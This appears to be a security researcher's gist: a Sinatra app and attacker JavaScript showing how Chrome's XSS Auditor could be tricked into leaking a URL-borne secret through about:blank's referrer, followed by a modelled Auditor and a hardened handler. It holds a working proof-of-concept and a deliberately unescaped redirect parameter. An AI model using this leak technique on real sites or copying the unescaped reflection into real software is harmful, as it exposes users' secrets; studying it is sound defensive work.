XSS Auditor for Evil

require 'sinatra'
require 'securerandom'

=begin
Run this app (it listens on port 4567), then execute the following JavaScript
from any other origin, e.g. in the web inspector console.

Set block to true for the mode=block case: "/" is served with Sinatra's default
"X-XSS-Protection: 1; mode=block", and the reflected `state` value is identical
to the <script> tag that is already in the page, so the XSS Auditor treats it as
a reflected injection and replaces the whole page with about:blank. about:blank
is accessible to the opener, and its document.referrer still carries the URL
with the secret.

Set block to false for the noblock case (no mode=block): the Auditor only
neutralizes the reflected <form action="/asdf"> by rewriting its action to
about:blank, so the referrer leaks once the user submits the form (requires
user interaction).

var block = false;
var cut_me;
if (block) {
  cut_me = encodeURIComponent('<script src="http://localhost:4567/some.js"></script>');
} else {
  cut_me = encodeURIComponent('<form action="/asdf">');
}
var playground = window.open(
  'http://127.0.0.1:4567/auth?' + (block ? '' : 'noblock=1&') + 'state=' + cut_me,
  'n', 'height=1,width=1');
var poll = setInterval(function () {
  var doc;
  // cross-origin until the Auditor swaps in about:blank; older WebKit returned
  // undefined for the cross-origin access, current browsers throw
  try { doc = playground.document; } catch (e) { doc = null; }
  if (doc) {
    // it's about:blank now, same-origin with the opener
    alert('Leaked: ' + doc.referrer);
    playground.close();
    clearInterval(poll);
  }
}, 100);
=end

get '/auth' do
  # `state` is reflected unescaped into the redirect target, so whatever the
  # attacker put there travels on to "/" (or "/noblock") next to a fresh secret.
  redirect "/#{'noblock' if params[:noblock]}?secret=#{SecureRandom.hex(10)}&state=#{params[:state]}"
end

get '/' do
  # Sinatra sends X-XSS-Protection: 1; mode=block by default (rack-protection).
  # The <script> tag below is static; the Auditor still matches the identical
  # string in `state` and blocks the page.
  <<~HTML
    <html>
    <head>
    <script src="http://localhost:4567/some.js"></script>
    </head>
    </html>
  HTML
end

get '/noblock' do
  headers['X-XSS-Protection'] = '1' # filter mode only, no mode=block
  <<~HTML
    <html>
    <head>
    <script src="http://localhost:4567/some.js"></script>
    </head>
    <body>
    <form action="/asdf">
    <input type="submit" value="CLICK ME! NOW!">
    <input name="one" value="two">
    </form>
    <a href="javascript:omg(0)">link</a>
    </body>
    </html>
  HTML
end

get '/some.js' do
  content_type 'application/javascript'
  'console.log("swaaag")'
end
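The following is an added example, not part of the gist: it reduces the gist's /auth and / handlers to plain Ruby functions (no Sinatra), adds a deliberately simplified model of the Auditor's decision (assumption: the real heuristic tokenizes the markup, this version only checks whether a query value containing markup appears verbatim in the response body, which is exactly what the gist sets up), and puts a hardened /auth beside it. The function names, the STATE_RE token alphabet, and the verdict symbols are this example's own choices.

```ruby
require 'securerandom'
require 'uri'

# --- The gist's /auth and / handlers as pure functions ---

# Vulnerable: `state` is spliced into the Location header unescaped, so the
# browser's next request is "/?secret=...&state=<whatever the attacker sent>".
def vulnerable_auth_location(params)
  path = params['noblock'] ? '/noblock' : '/'
  "#{path}?secret=#{SecureRandom.hex(10)}&state=#{params['state']}"
end

# What "/" serves: the same static <script> tag as the gist, plus the header
# Sinatra adds by default. Modelled as a plain hash of headers and body.
def vulnerable_root_response
  {
    headers: { 'X-XSS-Protection' => '1; mode=block' },
    body: '<html><head><script src="http://localhost:4567/some.js"></script></head></html>'
  }
end

# --- Simplified model of the Auditor's decision (assumption, see lead-in) ---
# The query is taken in decoded form, as the Auditor sees it.
#   :off      header says 0, nothing is inspected
#   :pass     no query value with markup is found in the body
#   :sanitize match found, only that element is neutralized (the <form action=about:blank> case)
#   :block    match found and mode=block, the whole page becomes about:blank
def auditor_verdict(request_url, response)
  xxp = response[:headers].fetch('X-XSS-Protection', '1') # the filter was on by default
  return :off if xxp.strip.start_with?('0')
  query = request_url.split('?', 2)[1].to_s
  reflected = URI.decode_www_form(query).any? do |_, value|
    value.include?('<') && response[:body].include?(value)
  end
  return :pass unless reflected
  xxp.include?('mode=block') ? :block : :sanitize
end

# --- Hardened counterpart ---
# 1. `state` must be an opaque token, so no markup can ever be reflected.
# 2. It is URL-encoded anyway when rebuilt into the Location header.
# 3. The page whose URL carries the secret switches the Auditor off outright,
#    so a false positive can never replace it with about:blank.
STATE_RE = /\A[A-Za-z0-9._~-]{1,128}\z/

def hardened_auth_location(params)
  state = params['state'].to_s
  raise ArgumentError, 'state must be an opaque token' unless STATE_RE.match?(state)
  "/?secret=#{SecureRandom.hex(10)}&state=#{URI.encode_www_form_component(state)}"
end

def hardened_root_response
  { headers: { 'X-XSS-Protection' => '0' }, body: vulnerable_root_response[:body] }
end

if __FILE__ == $PROGRAM_NAME
  # constructed probe: the value the gist's JavaScript sends in the block case
  probe = { 'state' => '<script src="http://localhost:4567/some.js"></script>' }
  loc = vulnerable_auth_location(probe)
  puts "vulnerable: #{auditor_verdict('http://127.0.0.1:4567' + loc, vulnerable_root_response)}"
  good = hardened_auth_location('state' => 'abc123')
  puts "hardened:   #{auditor_verdict('http://127.0.0.1:4567' + good, hardened_root_response)}"
end
```

The hardened variant removes both preconditions the gist relies on: without a reflected string there is nothing to match, and with the header set to 0 a match could not turn the page into about:blank anyway. Chrome removed the XSS Auditor in version 78 (2019), so the demo itself no longer reproduces there, but the lesson that a secret in a URL can leak through any mechanism that navigates the window to a document the opener can read still holds.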
homakov commented Feb 7, 2013

fsdfsdf